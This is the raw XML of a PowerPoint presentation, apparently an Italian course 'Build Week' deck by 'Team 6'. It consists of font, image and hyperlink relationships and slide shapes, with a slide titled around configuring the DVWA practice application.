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Lst>
  <p:sldSz cx="18288000" cy="10287000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Bank Gothic Medium" charset="1" panose="020B0807020203060204"/>
      <p:regular r:id="rId121"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="TT Fors Display Bold" charset="1" panose="020B0003080001020000"/>
      <p:regular r:id="rId122"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sauce Bold" charset="1" panose="00000800000000000000"/>
      <p:regular r:id="rId123"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sauce" charset="1" panose="00000500000000000000"/>
      <p:regular r:id="rId124"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sauce Light" charset="1" panose="00000400000000000000"/>
      <p:regular r:id="rId125"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans 1 Bold" charset="1" panose="020B0806030504020204"/>
      <p:regular r:id="rId126"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans 1" charset="1" panose="020B0606030504020204"/>
      <p:regular r:id="rId127"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans 1 Bold Italics" charset="1" panose="020B0806030504020204"/>
      <p:regular r:id="rId128"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans 1 Ultra-Bold Italics" charset="1" panose="00000000000000000000"/>
      <p:regular r:id="rId129"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans 1 Italics" charset="1" panose="020B0606030504020204"/>
      <p:regular r:id="rId130"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arimo Bold" charset="1" panose="020B0704020202020204"/>
      <p:regular r:id="rId131"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arimo" charset="1" panose="020B0604020202020204"/>
      <p:regular r:id="rId132"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arimo Bold Italics" charset="1" panose="020B0704020202090204"/>
      <p:regular r:id="rId133"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="TT Autonomous Mono Bold" charset="1" panose="020B0003030000000000"/>
      <p:regular r:id="rId134"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="TT Autonomous Mono" charset="1" panose="020B0003030000000000"/>
      <p:regular r:id="rId135"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans 2" charset="1" panose="00000000000000000000"/>
      <p:regular r:id="rId136"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans 2 Bold" charset="1" panose="00000000000000000000"/>
      <p:regular r:id="rId137"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sans 2 Semi-Bold" charset="1" panose="00000000000000000000"/>
      <p:regular r:id="rId138"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sauce Medium" charset="1" panose="00000600000000000000"/>
      <p:regular r:id="rId139"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Bank Gothic Light" charset="1" panose="020B0607020203060204"/>
      <p:regular r:id="rId140"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sauce Light Italics" charset="1" panose="00000400000000000000"/>
      <p:regular r:id="rId1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26" Target="fonts/font126.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId127" Target="fonts/font127.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId128" Target="fonts/font128.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId129" Target="fonts/font129.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId13" Target="slides/slide8.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId130" Target="fonts/font130.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId131" Target="fonts/font131.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId132" Target="fonts/font132.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId133" Target="fonts/font133.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId134" Target="fonts/font134.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId135" Target="fonts/font135.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId136" Target="fonts/font136.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId137" Target="fonts/font137.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId138" Target="fonts/font138.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId139" Target="fonts/font139.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId14" Target="slides/slide9.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide"/><Relationship Id="rId140" Target="fonts/font140.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><Relationship Id="rId141" Target="fonts/font141.fntdata" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font"/><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34.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image28.gif"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35.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image136.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image137.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image91.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56.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image91.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0.svg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId11" Target="../media/image70.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId12" Target="../media/image71.svg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><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57.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image158.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159.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42.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61.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image162.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63.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image161.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64.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image165.gif"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66.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image167.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68.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image169.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image170.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image171.svg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId9" Target="../media/image172.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73.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image174.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image90.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75.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image176.svg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image177.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image178.svg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image179.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId9" Target="../media/image180.sv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187.gif"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181.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image182.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image183.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image184.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image185.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId9" Target="../media/image186.jpe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88.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image189.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28.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6"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9.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image4.jpe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jpe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9.jpe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png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId4" Target="../media/image5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52.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image53.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5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5.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image4.jpe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8.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image59.gif"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gif"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gif"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7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74.jpeg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image75.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image2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76.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image4.jpe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79.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image14.gif"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2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gif"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4.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image87.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image8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8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8.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image90.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 Id="rId5" Target="../media/image91.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image2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92.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image9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 Id="rId7" Target="../media/image25.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image9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00.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image2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 Id="rId5" Target="../media/image101.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image102.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image103.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image9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04.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image105.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image4.jpe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 Id="rId7" Target="../media/image10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9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109.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image110.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1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113.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image114.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image14.gif"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https://it.wikipedia.org/wiki/Memoria_(informatica)" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId11" Target="https://it.wikipedia.org/wiki/Linguaggio_macchina" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><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15.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="https://it.wikipedia.org/wiki/Programmazione_strutturata" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId7" Target="https://it.wikipedia.org/wiki/Visibilit%C3%A0_(programmazione)" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId8" Target="https://it.wikipedia.org/wiki/Ricorsione" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId9" Target="https://it.wikipedia.org/wiki/Sistema_dei_tipi" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/></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15.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image2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16.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image97.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16.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image97.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17.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="../media/image118.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image119.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20.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21.jpe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22.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image1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gif"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24.jpe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25.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gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image126.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId9" Target="../media/image127.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4.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image128.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image129.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30.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4.gif"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131.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image132.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image133.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image100.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34.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image28.gif"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35.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image136.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image137.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image91.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38.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image139.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image115.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40.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image141.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image115.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42.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image25.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43.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image144.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image145.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46.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image147.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image148.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49.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gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId9" Target="../media/image150.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gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image151.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId9" Target="../media/image152.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53.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154.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="../media/image155.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId7" Target="../media/image132.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId8" Target="../media/image100.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3908549" y="-426321"/>
            <a:ext cx="8872884" cy="8229600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8229600" w="8872884">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8872885" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887288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707856" y="-361574"/>
            <a:ext cx="11498849" cy="11010148"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="11010148" w="11498849">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11498849" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11498849" y="11010148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11010148"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1747378" y="39052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0520886" y="-655487"/>
            <a:ext cx="11608429" cy="10766818"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="10766818" w="11608429">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11608429" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11608429" y="10766818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10766818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2456052" y="9263062"/>
            <a:ext cx="11910775"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false" rot="0">
            <a:off x="10004354" y="3688479"/>
            <a:ext cx="8057451" cy="5035907"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5035907" w="8057451">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8057450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8057450" y="5035907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5035907"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="261186" y="-97835"/>
            <a:ext cx="4046184" cy="8006071"/>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257" t="0" r="-22257"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8" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14626630" y="743769"/>
            <a:ext cx="4369456" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2689064" y="4331263"/>
            <a:ext cx="7044098" cy="2547824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="10243"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7316">
                <a:solidFill>
                  <a:srgbClr val="E9E9E9"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>BUILD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7316">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>WEEK  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="10243"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11993961" y="813752"/>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
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4867707" y="8249456"/>
            <a:ext cx="5511612" cy="1035827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8423"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6016">
                <a:solidFill>
                  <a:srgbClr val="E9E9E9"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>TEAM 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5400000">
            <a:off x="-1486089" y="-3938103"/>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23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="5064408" y="7903001"/>
            <a:ext cx="5403739" cy="5174080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5174080" w="5403739">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5403739" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5403739" y="5174080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5174080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="7672298" y="2557095"/>
            <a:ext cx="2102442" cy="2488814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="20321"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="14515">
                <a:solidFill>
                  <a:srgbClr val="E9E9E9"/>
                </a:solidFill>
                <a:latin typeface="TT Fors Display Bold"/>
              </a:rPr>
              <a:t>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="4294297"/>
            <a:ext cx="15381560" cy="2254251"/>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2.0 - Configurazione </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>DVWA</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71393"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319193" y="1028700"/>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1288184" y="3028319"/>
            <a:ext cx="5750608" cy="5750608"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5750608" w="5750608">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5750607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5750607" y="5750608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5750608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 21" id="21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
